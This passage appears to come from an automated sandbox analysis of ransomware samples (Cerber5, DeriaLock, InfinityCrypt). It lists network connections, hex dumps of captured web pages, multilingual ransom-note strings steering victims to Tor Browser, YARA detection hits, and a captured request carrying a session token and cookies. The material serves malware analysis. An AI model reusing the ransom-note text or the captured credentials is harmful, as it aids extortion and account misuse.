6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1596Date: Thu, 29 Sep 2022 12:48:01 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1596Date: Thu, 29 Sep 2022 12:48:07 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1596Date: Thu, 29 Sep 2022 12:48:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 23.50.105.163
          Source: unknownTCP traffic detected without corresponding DNS query: 40.90.65.8
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 93.184.220.29
          Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
          Source: unknownTCP traffic detected without corresponding DNS query: 95.140.236.128
          Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
          Source: unknownTCP traffic detected without corresponding DNS query: 8.238.189.126
          Source: unknownTCP traffic detected without corresponding DNS query: 95.140.236.128
          Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
          Source: unknownTCP traffic detected without corresponding DNS query: 8.238.189.126
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: unknownTCP traffic detected without corresponding DNS query: 131.253.33.200
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>If you have any pr<span class="h">lJqWq4h</span>oblems during installation or use of Tor&nbsp;Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the searc<span class="h">buy</span>h bar "Install Tor&nbsp;Browser Windows" and you will find a lot of training videos about Tor&nbsp;Browser installation and use.</p> equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>If you have any pr<span class="h">{RAND}</span>oblems during installation or use of Tor&nbsp;Browser, please, visit <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> and type request in the searc<span class="h">{RAND}</span>h bar "Install Tor&nbsp;Browser Windows" and you will find a lot of training videos about Tor&nbsp;Browser installation and use.</p> equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>Indien uw problemen heeft tijdens de installatie of het gebruik van Tor&nbsp;Browser, ga dan naar <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> en typ in de zoekbalk equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <p>Se si riscontrano problemi durante l'installazione o l'utilizzo di Tor&nbsp;Browser, visitare <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> e immettere "install tor browser windows" nella barra di ricerca per trovare numerosi video esplicativi sull'installazione e utilizzo di Tor&nbsp;Browser.</p> equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: do portalu <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> i wpisz w wyszukiwarce equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: hrend der Installation von Tor&nbsp;Browser Probleme haben, besuchen Sie bitte <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> und geben als Suchanforderung "tor browser Windows installieren" ein und Sie erhalten in den Suchergebnossen viele Anleitungsvideos equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: n, o durante el uso del Navegador Tor, visite <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> y escriba la solicitud en la barra de b equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: o do Tor&nbsp;Browser, visite <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> e insira o pedido na barra de pesquisa equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: rken herhangi bir sorununuz olursa <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> adresine gidin ve arama equals www.youtube.com (Youtube)
          Source: Endermanch@Cerber5.exe, 00000017.00000003.487431383.0000000005415000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: utilisation de Tor&nbsp;Browser, veuillez visiter <a href="https://www.youtube.com/results?search_query=Install+Tor+Browser+Windows" target="_blank">https://www.youtube.com</a> et saisir la demande dans la barre de recherche equals www.youtube.com (Youtube)
          Source: unknownHTTP traffic detected: POST /threshold/xls.aspx HTTP/1.1Origin: https://www.bing.comReferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/InitContent-type: text/xmlX-MSEdge-ExternalExpType: JointCoordX-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40X-PositionerType: DesktopX-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguageX-Search-SafeSearch: ModerateX-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}X-UserAgeClass: UnknownX-BM-Market: USX-BM-DateFormat: M/d/yyyyX-CortanaAccessAboveLock: falseX-Device-OSSKU: 48X-BM-DTZ: -420X-BM-FirstEnabledTime: 132061387448759736X-DeviceID: 0100748C09001CEAX-BM-DeviceScale: 100X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard TimeX-BM-Theme: 000000;0078d7X-BM-DeviceDimensionsLogical: 1232x1024X-BM-DeviceDimensions: 1232x1024X-Agent-DeviceId: 0100748C09001CEAX-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAamq5M9zPR5nuHfG3veMN5/jENMWNA4fbZEHrQpT8BxSz5%2BSh5s4f1VkbpEPJ9rOEPqabrlSbr3eu%2BoZ%2BB2QzG133x3OMu2w96LpDS72zKITv4CbqIeNkcmWB/nVghgXwvmWdxixlmtp6kSunXq0UxzmSBBrhPFVEwr%2B7mBUJhX5BUVIhqC%2B/divBqd1yet423TssuRskex24LtlkR6K5yP46R4zY881kAl/bUeEXcX7f5ULouRbplsaB3Dq1106wr4WW0K9M0VClTT34J86Y3c4PD0df7CmcP8WgB8qmWS1O2hKAoBamMRHZrSlmrH7NLzQDNCD1dIERCgVe2ufG5UDZgAACKOSvVfSgvd%2BqAGDhQ99hvMd5BU4o1M9GfaTzGHI6kqy4kOCqlaLU5wwi4ftfXIfqdARi2nWjggxLkcbJrJKl/g6hsdBRJyB9Hrdvn%2BU63FMHfZPLGZuGzPc9FN2qZC26frSLvI60cKLfeUt2SU6SQu%2BhuqdeyO/ThXuNgcfzrj3WejpOiRFHFeJ%2BeGrTapCDATYQ015PS188H8jEgFi9YsBp7gjZSPEg4CaGzlxgSACxhv6xhgATPyAkNWgcdSn90JBWajvPogFLs0GL1ugBmGAglEvFBeu7kxJjhrk7Lvl1EIB2pr4TNxLX5YwNxi1faaPg6yB5CD5mhOgnCGmf9RYdN6YATZQB45gzbl55n2FdvF0JDFgmwOXUAiOnR%2BX7JIMaeE6etzOS2YrO7c8K2Vp/gyZ6s/x6w6hs6lFOJPLHxwwE6DPsskFwiEF5Ma3p%2Bp9r31XNsuQDims7OK6dWJYMo6ej2eVHZSbid%2B3skvim3vN0GOipf4OGHIJCdZeovRtAtKl0g2uPL%2B5lkr4%2BXyDrYl6yPiq8LJ6V16ftmQdSLdXGC2YgiUjjswpD8ppqZmI1gE%3D%26p%3DX-BM-CBT: 1660690402X-Device-isOptin: trueX-Device-Touch: falseX-Device-ClientSession: 27851B8F478B4558A23A9FEEA1D2C283X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIX-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeaderAccept: */*Accept-Language: en-USAccept-Encoding: gzip, deflate, brUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134Host: www.bing.comContent-Length: 65252Connection: Keep-AliveCache-Control: no-cacheCookie: MUID=54AD14FB4D1E4A6C815A867991009454; _SS=CPID=1664487862703&AC=1&CPH=4ef661f2; SRCHUID=V=2&GUID=CA49BB2BEB184018891765A9BD1D863D&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20220929; SRCHHPGUSR=SRCHLANG=en; ANON=A=84D464251C6428FCBF66122FFFFFFFFF; MUIDB=54AD14FB4D1E4A6C815A867991009454
          Source: unknownHTTPS traffic detected: 23.50.105.163:443 -> 192.168.2.6:49707 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.110.133:443 -> 192.168.2.6:49710 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49769 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 131.253.33.200:443 -> 192.168.2.6:49778 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.6:49793 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49798 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.190.159.74:443 -> 192.168.2.6:49800 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.189.173.20:443 -> 192.168.2.6:49810 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.189.173.21:443 -> 192.168.2.6:49813 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 131.188.40.189:443 -> 192.168.2.6:49853 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 193.23.244.244:443 -> 192.168.2.6:49868 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 104.208.16.94:443 -> 192.168.2.6:49871 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 13.89.179.12:443 -> 192.168.2.6:49883 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 140.82.121.4:443 -> 192.168.2.6:49892 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49895 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 20.42.65.92:443 -> 192.168.2.6:49905 version: TLS 1.2
          Source: C:\Windows\302746537.exeCode function: 15_2_00405D3C GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetFocus,GetFocus,GetClassNameA,_strncoll,GetFocus,SendMessageA,GetPropA,15_2_00405D3C

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Source: Yara matchFile source: 27.0.Endermanch@DeriaLock.exe.a20000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0000001B.00000000.424660470.0000000000A66000.00000002.00000001.01000000.00000016.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Endermanch@DeriaLock.exe PID: 4008, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\Desktop\Endermanch@DeriaLock.exe, type: DROPPED
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 4900, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: Endermanch@Cerber5.exe PID: 480, type: MEMORYSTR
          Source: Yara matchFile source: 56.0.Endermanch@InfinityCrypt.exe.6631cc.1.unpack, type: UNPACKEDPE
